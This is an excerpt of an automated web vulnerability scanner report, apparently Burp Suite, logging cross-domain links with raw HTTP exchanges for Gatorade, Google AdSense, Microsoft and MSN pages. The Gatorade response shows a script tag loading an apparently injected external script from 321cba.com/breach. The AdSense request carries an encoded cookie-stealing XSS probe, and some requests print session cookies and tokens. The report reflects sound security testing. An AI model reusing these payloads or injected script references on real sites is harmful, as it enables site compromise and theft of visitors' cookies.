<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344370?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<li><a href="http://msn.foxsports.com/golf/story/Farmers-Insurance-Open-Phil-Mickelson-Tiger-Woods-Bill-Haas-012911
" target='_blank'>Mickelson tied for lead at Torrey Pines
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/golf/leaderboard
" target='_blank'>Scores
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/tennis/story/maturity-experience-aid-clijsters-to-first-australian-open-title-012911
" target='_blank'>Maturity, experience aid Clijsters to title
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Louisville-takes-down-fifth-ranked-Connecticut-in-double-overtime-012811
" target='_blank'>Louisville holds off UConn in double OT
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-21-Georgetown-upsets-eighth-ranked-Villanova-012811
" target='_blank'>No. 21 Hoyas handle No. 8 Villanova
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-9-Syracuse-loses-fourth-game-in-a-row-012911
" target='_blank'>Syracuse loses fourth straight game
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/scores?scheduleDayCode=2011-1-29&region=&tournament=&conference=0
" target='_blank'>Live college hoops scoreboard
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar/story/24-Hours-of-Daytona-beings-Chip-Ganassia-Racing-problems-012911
" target='_blank'>Day of racing at Daytona begins
</a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">FOX Sports Detroit</a><br>

<a href="http://www.foxsportsflorida.com"

target="_blank">FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&pid=foxsports'">Tickets</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.redacted/0TO_/enus">Legal</a></li><li><a href="http://advertising.redacted/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

22.425. http://www.gatorade.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gatorade.com
Path:	/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.gatorade.com/default.aspx?s=gseries

The response contains the following links to other domains:

http://321cba.com/breach/18.js
http://facebook.com/Gatorade
http://get.adobe.com/flashplayer
http://twitter.com/gatorade
http://www.gssiweb.com/
http://youtube.com/whatsg

Request

GET /default.aspx?s=gseries HTTP/1.1
Host: www.gatorade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:53:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ozr1wv55ybnk4g55zqh2ce55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Gatorad
...[SNIP]...
<meta name="google-site-verification" content="urVYKRjWIeor2vJRZ8fvAklweDgUIM76CTiQ-jlkHiE" />

<script type="text/javascript" src="http://321cba.com/breach/18.js"></script>
...[SNIP]...

<a href="http://get.adobe.com/flashplayer">
<img src="/images/noflash/get_flash_player.gif" alt="Get Flash Player" style="border: 0;
margin: 20px 0 8px 15px" />
...[SNIP]...
<li><a href="http://www.gssiweb.com" onclick="window.open('http://www.gssiweb.com'); return false">
GSSI</a>
...[SNIP]...
<li><a href="http://facebook.com/Gatorade" onclick="window.open('http://facebook.com/Gatorade'); return false">
FACEBOOK</a>
...[SNIP]...
<li><a href="http://twitter.com/gatorade" onclick="window.open('http://twitter.com/gatorade'); return false">
TWITTER</a>
...[SNIP]...
<li><a href="http://youtube.com/whatsg" onclick="window.open('http://youtube.com/whatsg'); return false">
YOUTUBE</a>
...[SNIP]...
<li><a href="http://www.gssiweb.com" onclick=" trackingEvent('/exit/gssi'); window.open('http://www.gssiweb.com');return false">
GSSI</a>
...[SNIP]...
<li><a href="http://facebook.com/Gatorade" onclick="trackingEvent('/exit/facebook'); window.open('http://facebook.com/Gatorade'); return false">
FACEBOOK</a>
...[SNIP]...
<li><a href="http://twitter.com/gatorade" onclick="trackingEvent('/exit/twitter'); window.open('http://twitter.com/gatorade'); return false">
TWITTER</a>
...[SNIP]...
<li><a href="http://youtube.com/whatsg" onclick="trackingEvent('/exit/youtube'); window.open('http://youtube.com/whatsg'); return false">
YOUTUBE</a>
...[SNIP]...

22.426. https://www.google.com/adsense/support/bin/request.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/adsense/support/bin/request.py

Issue detail

The page was loaded from a URL containing a query string:

https://www.google.com/adsense/support/bin/request.py?contact=abg_afc&url=http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1%27%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E6033be6539a/&hl=en&client=ca-pub-0397559301561409

The response contains the following link to another domain:

https://ssl.google-analytics.com/ga.js

Request

GET /adsense/support/bin/request.py?contact=abg_afc&url=http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1%27%253E%253Cscript%253Ealert(document.cookie)%253C/script%253E6033be6539a/&hl=en&client=ca-pub-0397559301561409 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D16496d0070846078%26v%3D2%26c%3De08e7d44%26s%3D4d44c48d%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 30-Jan-2011 02:23:17 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 01:53:17 GMT
Expires: Sun, 30 Jan 2011 01:53:17 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//ssl.google-analytics.com/ga.js'
type='text/javascript'></script>
...[SNIP]...

22.427. http://www.macromedia.com/shockwave/download/index.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.macromedia.com
Path:	/shockwave/download/index.cgi

Issue detail

The page was loaded from a URL containing a query string:

http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

The response contains the following link to another domain:

http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

Request

GET /shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash HTTP/1.1
Host: www.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 30 Jan 2011 01:53:51 GMT
Server: Apache
Location: http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
Content-Length: 288
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">here</a>
...[SNIP]...

22.428. http://www.microsoft.com/web/gallery/install.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/web/gallery/install.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft.com/web/gallery/install.aspx?appid=silverlight4tools;silverlight4toolkit;riaservicestoolkit

The response contains the following links to other domains:

http://blogs.iis.net/
http://blogs.msdn.com/b/brian_swan/
http://blogs.msdn.com/b/interoperability/
http://blogs.msdn.com/b/webplatform/
http://blogs.msdn.com/ie
http://blogs.msdn.com/webdevtools/
http://channel9.msdn.com/
http://i1.asp.net/asp.net/images/discountasp.png
http://i1.asp.net/asp.net/images/softsys-logo.png
http://i1.asp.net/common/www-css/i/logo_host_planet.png
http://m.webtrends.com/dcs8muh1110000wwq7so0uysl_9h7u/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=MS.3.0.0
http://on10.net/
http://ruslany.net/
http://silverlight.net/
http://silverlight.net/Community/
http://team.silverlight.net/
http://twitter.com/mswebplatform
http://weblogs.asp.net/Scottgu/
http://www.asp.net/
http://www.asp.net/community/
http://www.bizspark.com/
http://www.codeplex.com/
http://www.facebook.com/WebPlatform
http://www.hanselman.com/
http://www.iis.net/
http://www.msstudentlounge.com/
http://www.youtube.com/user/microsoftwebplatform

Request

GET /web/gallery/install.aspx?appid=silverlight4tools;silverlight4toolkit;riaservicestoolkit HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE8
X-AspNet-Version: 4.0.30319
Set-Cookie: WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
VTag: 791820740500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:30:59 GMT
Content-Length: 74785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head
...[SNIP]...
<li><a href="http://www.youtube.com/user/microsoftwebplatform" onclick="dcsMultiTrack('DCS.dcssip','www.youtube.com','DCS.dcsuri','/user/microsoftwebplatform','WT.ti','Link:Social%20YouTube','WT.z_convert','Social-YouTube','WT.dl','1','WT.z_ea_name','Social YouTube','WT.z_ea_actionoffer', 'Social-YouTube'); window.open(this.href, '_blank', ''); return false;"><img src="/web/media/icons/youtube_logo25x25.png" class="socialIcon" alt="YouTube" />
...[SNIP]...
<li><a href="http://twitter.com/mswebplatform" onclick="dcsMultiTrack('DCS.dcssip','twitter.com','DCS.dcsuri','/mswebplatform','WT.ti','Link:Social%20Twitter','WT.z_convert','Social-Twitter','WT.dl','1','WT.z_ea_name','Social Twitter','WT.z_ea_actionoffer', 'Social-Twitter'); window.open(this.href, '_blank', ''); return false;"><img src="/web/media/icons/twitter_logo25x25.png" class="socialIcon" alt="Twitter" />
...[SNIP]...
<li><a href="http://www.facebook.com/WebPlatform" onclick="dcsMultiTrack('DCS.dcssip','www.facebook.com','DCS.dcsuri','/WebPlatform','WT.ti','Link:Social%20Facebook','WT.z_convert','Social-Facebook','WT.dl','1','WT.z_ea_name','Social Facebook','WT.z_ea_actionoffer', 'Social-Facebook'); window.open(this.href, '_blank', ''); return false;"><img src="/web/media/icons/facebook_logo25x25.png" class="socialIcon" alt="Facebook" />
...[SNIP]...
<li class="AspNet-Menu-Leaf AspNet-Menu-Last">
<a href="http://www.bizspark.com/" class="AspNet-Menu-Link" title="For Startups">
<span class="AspNet-Menu-Left">
...[SNIP]...
</h2>
<img src="http://i1.asp.net/asp.net/images/discountasp.png" alt="discount ASP.NET" class="hoster-logo" />
<h3>
...[SNIP]...
</h2>
<img src="http://i1.asp.net/asp.net/images/softsys-logo.png" alt="Softsys Hosting" class="hoster-logo" />
<h3>
...[SNIP]...
</h2>
<img src="http://i1.asp.net/common/www-css/i/logo_host_planet.png" alt="The Planet - The Global IT Hosting Leader" class="hoster-logo" />
<h3>
...[SNIP]...
<li><a title="IIS" href="http://www.iis.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IIS</a>
...[SNIP]...
<li><a title="ASP.NET" href="http://www.asp.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">ASP.NET</a>
...[SNIP]...
<li><a title="Silverlight" href="http://silverlight.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Silverlight</a>
...[SNIP]...
<li><a title="ASP.NET Community" href="http://www.asp.net/community/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">ASP.NET Community</a>
...[SNIP]...
<li><a title="IIS Community" href="http://www.iis.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IIS Community</a>
...[SNIP]...
<li><a title="Silverlight Community" href="http://silverlight.net/Community/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Silverlight Community</a>
...[SNIP]...
<li><a title="Student Lounge" href="http://www.msstudentlounge.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Student Lounge</a>
...[SNIP]...
<li><a title="Channel 9" href="http://channel9.msdn.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Channel 9</a>
...[SNIP]...
<li><a title="Channel 10" href="http://on10.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Channel 10</a>
...[SNIP]...
<li><a title="CodePlex" href="http://www.codeplex.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">CodePlex</a>
...[SNIP]...
<li><a title="Web Platform Team Blog" href="http://blogs.msdn.com/b/webplatform/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Web Platform Team Blog</a>
...[SNIP]...
<li><a title="IIS Team Blog" href="http://blogs.iis.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IIS Team Blog</a>
...[SNIP]...
<li><a title="Web Tools Team Blog" href="http://blogs.msdn.com/webdevtools/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Web Tools Team Blog</a>
...[SNIP]...
<li><a title="Silverlight Team Blog" href="http://team.silverlight.net" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Silverlight Team Blog</a>
...[SNIP]...
<li><a title="Internet Explorer Team Blog" href="http://blogs.msdn.com/ie" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">IE Team Blog</a>
...[SNIP]...
<li><a title="Brian Swan's Blog" href="http://blogs.msdn.com/b/brian_swan/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Brian Swan's Blog</a>
...[SNIP]...
<li><a title="Ruslan Yakushev's Blog" href="http://ruslany.net/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Ruslan Yakushev's Blog</a>
...[SNIP]...
<li><a title="Interop Team Blog" href="http://blogs.msdn.com/b/interoperability/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Interop Team Blog</a>
...[SNIP]...
<li><a title="Scott Guthrie's Blog" href="http://weblogs.asp.net/Scottgu/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Scott Guthrie's Blog</a>
...[SNIP]...
<li><a title="Scott Hanselman's Blog" href="http://www.hanselman.com/" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">Scott Hanselman's Blog</a>
...[SNIP]...
<div>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://m.webtrends.com/dcs8muh1110000wwq7so0uysl_9h7u/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=MS.3.0.0"/>
</div>
...[SNIP]...

22.429. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1

The response contains the following links to other domains:

http://advertising.microsoft.com/home/home
http://col.stb.s-redacted/i/1C/562F924B0BFF0EF9E7EB8EAB7627.jpg
http://col.stb.s-redacted/i/1F/B5E89286961128824C7AE6885EC.jpg
http://col.stb.s-redacted/i/25/0E3EF1611A1E83275679938D78B0.jpg
http://col.stb.s-redacted/i/2A/D52DA0C2C7D0F37DBB382A8318106A.jpg
http://col.stb.s-redacted/i/40/6087ED1789141E9E7E7476F7D2A816.jpg
http://col.stb.s-redacted/i/42/40224F9769E8AD5EA8F8A624E74A.jpg
http://col.stb.s-redacted/i/56/AE3B1E3A7AE6E076D8253197D1489B.jpg
http://col.stb.s-redacted/i/62/47BC124184233113131B97F8F8359E.jpg
http://col.stb.s-redacted/i/6A/5F94C974FCBAE14AFF1F886AE8B.jpg
http://col.stb.s-redacted/i/6D/94835E23C59DA9988832DB01F.jpg
http://col.stb.s-redacted/i/79/3D0CF24EE45332AEC818733145573.jpg
http://col.stb.s-redacted/i/80/2FF81810DDCE8AD3FEECAFC567B1FA.jpg
http://col.stb.s-redacted/i/8B/97F3ADB0E857BC24D9E8B13F3984.jpg
http://col.stb.s-redacted/i/97/46C217C8DB39C2D6289FA229C0D5BD.jpg
http://col.stb.s-redacted/i/9A/ADE8D0D0F6E1E0938CFDB1EA5D949E.jpg
http://col.stb.s-redacted/i/9F/2177C83925E3767FB9AC282991F22.jpg
http://col.stb.s-redacted/i/A4/C9F6DB1429C482320999B20976453.jpg
http://col.stb.s-redacted/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg
http://col.stb.s-redacted/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg
http://col.stb.s-redacted/i/B5/F9DAF1B9A4431DBA728B9CFFBAAF3.jpg
http://col.stb.s-redacted/i/B7/CA0287F24D531F31B28EDED6FF651.jpg
http://col.stb.s-redacted/i/C1/EC55D18C76E570E2D9F5B31996EFBC.jpg
http://col.stb.s-redacted/i/F9/5BC51AED48AF6FAE2ADD2AF77F074.jpg
http://col.stb.s-redacted/i/FB/39B57119E113EAC72C86F212549.jpg
http://col.stc.s-redacted/br/sc/i/icons/adchoices_gif.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod
http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000
http://msn.foxsports.com/collegebasketball/scores
http://msn.foxsports.com/golf/leaderboard
http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911
http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911
http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911
http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911
http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911
http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002
http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88&yr=2011
http://static.foxsports.com/content/fscom/img/2011/01/29/012911-CBK-Louisville-TWICE-AS-NICE-JW-PI_20110129151135131_303_117.JPG
http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNHPT
http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010
http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010
http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010
http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010
http://www.bing.com/shopping/content/search?q=Cupcake+Stand&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet3_jl0125_1x1&gt1=36010
http://www.bing.com/shopping/content/search?q=Hair+Loss+Remedy%3a+Spectral+DNC+Topical+Hair+Loss+Treatment&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet5_jl0125_1x1&gt1=36010
http://www.bing.com/shopping/content/search?q=NFL+Jerseys%3a+Brett+Favre&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet2_jl0125_1x1&gt1=36010
http://www.bing.com/shopping/content/search?q=Weight+Loss%3a+Glaxo+Smith+Kline+Alli&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet4_jl0125_1x1&gt1=36010
http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON
http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON
http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon
http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007
http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007
http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp
http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002
http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
